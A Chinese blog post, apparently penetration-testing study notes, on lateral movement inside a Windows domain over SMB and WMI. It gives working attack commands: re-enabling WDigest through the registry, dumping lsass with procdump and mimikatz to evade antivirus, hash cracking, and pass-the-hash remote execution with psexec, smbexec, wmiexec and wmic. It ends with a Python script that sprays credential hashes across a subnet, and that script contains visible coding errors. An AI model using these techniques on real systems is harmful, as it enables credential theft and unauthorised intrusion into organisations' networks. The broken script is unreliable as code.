内网安全 - 域横向 smb&wmi

最新推荐文章于 2024-03-18 09:54:15 发布
最新推荐文章于 2024-03-18 09:54:15 发布
阅读量272 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/acepanhuan/article/details/129549580
版权

域横向 smb&wmi

基础知识

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题:
	1.利用哈希hash传递(pth,ptk等)进行移动
	2.利用其他服务协议(SMB,WMI等)进行哈希移动
	3.利用注册表操作开启Wdigest Auth值进行获取
	4.利用工具或第三方平台(Hachcat)进行破解获取
注册表修改,开启wdigest
reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDige st /v UseLogonCredential /t REG DWORD /d 1 /f 


Windows系统LM HASH及NTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash。

Procdump+Mimikatz配合获取密码

解决实战中Mimikatz被杀毒软件拦截问题。

当Mimikatz被杀毒软件拦截,可通过procdump 配合 mimikatz
因为procdump是windows官方的软件,所以在实战时一般不会对其进行拦截

运行procdump在当前目录下生成lsass.dmp文件
	procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz 上执行还原出来密码:
	privilege::debug
	sekurlsa::minidump lsass.dmp
	sekurlsa::logonPasswords full


Hashcat破解获取Windows NTML Hash:
hashcat -a0-m 1000hash file --force

Hashcat下载地址以及使用方法见:https://zhuanlan.zhihu.com/p/35661801

procdump下载
procdump上传到对方服务器,执行procdump -accepteula -ma lsass.exe lsass.dmp,会在当前目录生成一个lsass.dmp文件
在这里插入图片描述
在这里插入图片描述
将对方服务器上生成的dmp文件复制到本地mimikatz的目录
在本机通过mimikatz来读取dmp文件里的内容
在这里插入图片描述
可以看到已经成功读取到lsass.dmp文件里面的账户密码了。
在这里插入图片描述

域横向移动SMB服务利用-psexec,smbexec

psexec

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。
  psexec 是pstools 微软官方软件中的一个工具,是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口,只需要对方开启admin$共享 (该共享默认开启)。但是,假如目标主机开启了防火墙,psexec也是不能使用的,会提示找不到网络路径。由于psexec是Windows提供的工具,所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后,很多安全厂商开始将PsExec加入了黑名单。
psexec下载地址 

psexec 第一种方式:先有 ipc 链接,psexec 需要明文或 hash 传递
	net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
	psexec \\192.168.3.32 -s cmd # 需要先有 ipc 链接 -s 以 System 权限运行

在这里插入图片描述

psexec 第二种方式:不用建立 IPC 直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

在这里插入图片描述
可以看到使用明文密码直接连接成功,那我们试一下用hash来进行登录。
在这里插入图片描述
  这里出现了问题,查资料发现官方 Pstools psexec 无法采用 hash 连接,这里解决办法就是采用impacket的psexec。
impacket工具包介绍
在这里插入图片描述
  可以看到使用hash连接成功了,但是impacket的psexec是非官方的,容易被杀毒软件干掉。

smbexec 无需先 ipc 链接 明文或 hash 传递

impacket工具包 smbexec协议

#smbexec 无需先 ipc 链接 明文或 hash 传递
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32

smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21

smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7god/administrator@192.168.3.21

在这里插入图片描述

域横向移动WMI服务利用-cscript,wmiexec,wmic

  WMI(Windows Management Instrumentation) 是通过 135 端口进行利用,支持用户名明文或者 hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

自带 WMIC 明文传递 无回显 官方

缺点:无回显,需要自己去读取目标主机上执行命令产生结果的文件内容
优点:不会被杀毒软件干扰

wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c 
ipconfig >C:\1.txt"

在这里插入图片描述

连接完毕后,在⽬标主机上连接的那个域主机上出现了1.txt.在这里插入图片描述

自带 cscript 明文传递 有回显

将wmiexec.vbs上传到对方主机
需要借助wmiexec.vbs文件,切换到wmiexec.vbs所在目录执行cmd窗口

cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

在这里插入图片描述

套件 impacket wmiexec 明文或 hash 传递 有回显 exe 版本

有可能被杀毒软件拦截
上传后切换到impacket-examples-windows目录,通过wmiexec执行

wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

通过明文密码进行连接
在这里插入图片描述
通过hash值进行连接
在这里插入图片描述

总结

通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截
通过官方自带命令WMIC时,只支持明文且没有回显需自己读取
通过官方自带命令cscript与wmiexec.vbs配合时有回显,但是只支持明文
通过非官方impacket-examples-windows中psexec和smbexec和wmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截
现在基本通过mimikatz获取的密码都是密文的

impacket-examples-windows下载地址
impacket下载地址
pstools下载地址
procdump下载地址

域横向移动以上服务bash批量利用

使用Python脚本来进行批量跑

import os,time
from threading import Thread

def get_user(ip)
	users={
		'Administrator',
		'boss',
		'dbadmin',
		'fileadmin',
		'mack',
		'mary',
		'webadmin'
	}
	hashs={
	'ccef208c6485269c20db2cad21734fe7',
	'518b98ad4178a53695dc997aa02d455c'
}
	for user in users:
		for mimahash in hashs:
			#wmiexec -hashes :hashgod/user@ipwhoami
			exec = "wmiexec -hashes :"+mimahash+" god/"+user+"@"+ip+" whoami"
			print('--->' + exec + '<---')
			os.system(exec)
			time.sleep(0.5)

def main(ip):
	for ip in ips:
		t = Thread(target=check_pass,args=(ip,))
		t.start()
ips={
	'192.168.3.21',
	'192.168.3.25',
	'192.168.3.29',
	'192.168.3.30',
	'192.168.3.32'
}
if __name__ == "__main__":
    main(ips)
acepanhuan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WMI-Class-Library.zip_WMI Class_wmi
09-23
WMI,包括WMI Namespace.chm 及 WMI.dll
p67 内安全-横向 smb&wmi 明文或 hash 传递
weixin_43263566的博客
04-24 541
p67 内安全-横向 smb&wmi 明文或 hash 传递
smbexec: 简单、高效的远程执行命令工具
最新发布
gitblog_00002的博客
03-18 394
smbexec: 简单、高效的远程执行命令工具 smbexec 是一个轻量级的 Python 脚本,用于通过 SMB 协议在目标机器上执行命令。它利用了 Windows 操作系统中的某些漏洞,可以轻松地实现远程命令执行。smbexec 使用简单,功能强大,是渗透测试和安全研究的理想工具。 应用场景 smbexec 可以广泛应用于以下场景: 络审计:对内进行安全审计,发现潜在的安全风险。 ...
渗透-横向移动命令总结
m0_60571990的博客
12-02 767
渗透-横向移动命令总结
WMI使用学习笔记
crowsec
10-21 3725
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
横向移动-传递攻击WMI服务利用cscript&vmiexec&wmic
m0_65096687的博客
05-28 190
wim是通过135端口进行利用的,支持明文和hash的方式进行认证,并且不会在目标系统日志下留下痕迹。
CPU-info.zip_wmi cpu 内存
07-14
程序读取某些WMI类数据、CPU(包括核)和内存使用(使用性能计数器)。
使用j-Interop实现java连接wmi获取windows系统信息的例子
04-25
使用j-Interop实现java连接wmi获取windows系统信息的例子 可以直接导入MyEclipse运行,能够获取CPU,主板,显卡,声卡,卡,以及CPU使用率,内存使用率等
go-wmi-hyper-v.txt
09-28
go通过调用Windows wmi 生成hyper-v虚拟机,不包括修改内存,CPU等操作
dotnet-仅用于MicrosoftWindows的WMI的命令shell封装
08-14
仅用于Microsoft Windows的WMI的命令shell封装
【学习笔记】内安全3-HASH连接
Lazy_SugaR的博客
05-29 617
原理 明文连接失效: windows2012以上版本默认关闭wdigest,攻击者无法从内测中获取明文密码 windows2012以下版本安装KB2871997补丁,同时也会导致无法获取明文密码 解决: 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 注意: Windows系统LM Hash及NTLM Hash加密算法,个人系统在Win
安全——横向移动-WMI&SMB&Proxychains&CrackMapExec
m0_61506558的博客
02-01 476
WMI是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。再生成后门,放在wwwroot目录下,等待下载。当然也可以通过建立节点进行操作,如下。第一条命令是下载,第二条命令是执行。将后门放在跳板机上,等待访问下载。再调用程序,得到一定的权限。上传wmiexec. vbs。
横移之WMIexec
Canterlot的博客
09-04 2633
本文详细介绍了WMIexec的运行原理及特点,命令执行过程,相关工具用法等
【内安全-横向移动】WMI-WMIC命令&相关内工具
02-08 8771
横向移动-WMI-WMIC命令】wmic、impacket-wmiexec、wmicmd.exe、WMIHACKER
探索 Mimikatz 神器之 WDigest
systemino的博客
07-04 2441
自从 Mimikatz 出现以来,我们很多人已经对这个工具进行过封装,也尝试过注入,或者是使用 powershell 实现类似的功能。现在我们决定给这个工具添加一个内存 dump 的功能,无论我们如何封装使用 Mimikatz,它仍然是 Windows 系统中从 lsass 进程中提取凭证的首选工具。 当然,这是因为微软引入的每一个新的安全措施,GentilKiwi 总会有对应的“诡计”。 如果你...
Mimikatz的18种免杀姿势及防御策略
Xor0ne
05-01 7073
PS:建议 :win10慎用,唉,伤心 然后按照里面的的步骤一步步去执行,有很多错误,所以如果您只是看技巧的话,可以去原文查看哦。或者读的时候略过我的错误部分啦。>_< 免杀介绍中方法【1-10】转载于自于: Mimikatz的18种免杀姿势及防御策略(上) 文章目录0x01前言0x02免杀介绍方法0-原生态mimikatz.exe(VT查杀率55/71)方法1-加壳+签名+资源替换(...
几种姿势运行mimikatz
小晓晓晓林的博客
01-21 4782
Mimikatz是一款能够从Windows认证(LSASS)的进程中获取内存,并且获取明文密码和NTLM哈希值的神器,内渗透中常用mimikatz获取明文密码或者获取hash值来漫游内。但是在实际的运用中,常常会遇到杀软的拦截,所以这里我借鉴上的资料,进行复现学习,达到免杀绕过的目的。有些方式没有复现成功我就没有写出来了,有一些成功之后似乎也会被拦截了。 姿势一:powershell ...
bat 远程桌面登陆 命令_内渗透之渗透命令执行总结
weixin_39646021的博客
11-26 633
前言AD的全称是Active Directory:活动目录(Domain)是Windows络中独立运行的单位,之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在之间的桥梁。当一个与其他建立了信任关系后两个之间不但可以按需要相互进行管理,还可以跨分配文件和打印机等设备资源,使不同的之间实现络资源的共享与管理,以及相互通信和数据传输。在...
WMI-Win32_NetworkAdapter 卡参数
05-31
WMI-Win32_NetworkAdapter类可以用于获取与计算机上的络适配器相关的信息。它包含了许多属性,可以用来获取卡的参数,例如: - AdapterType:络适配器的类型。 - MACAddress:络适配器的物理地址。 - NetConnectionID:络适配器的连接名称。 - NetEnabled:络适配器是否启用。 - Speed:络适配器的速度。 你可以使用WMI查询语言(WQL)来查询WMI-Win32_NetworkAdapter类的属性,以获取卡参数的值。例如,以下是一个使用PowerShell查询卡参数的示例: ``` Get-WmiObject -Class Win32_NetworkAdapter -Property AdapterType, MACAddress, NetConnectionID, NetEnabled, Speed ``` 这将返回计算机上所有络适配器的AdapterType、MACAddress、NetConnectionID、NetEnabled和Speed属性的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值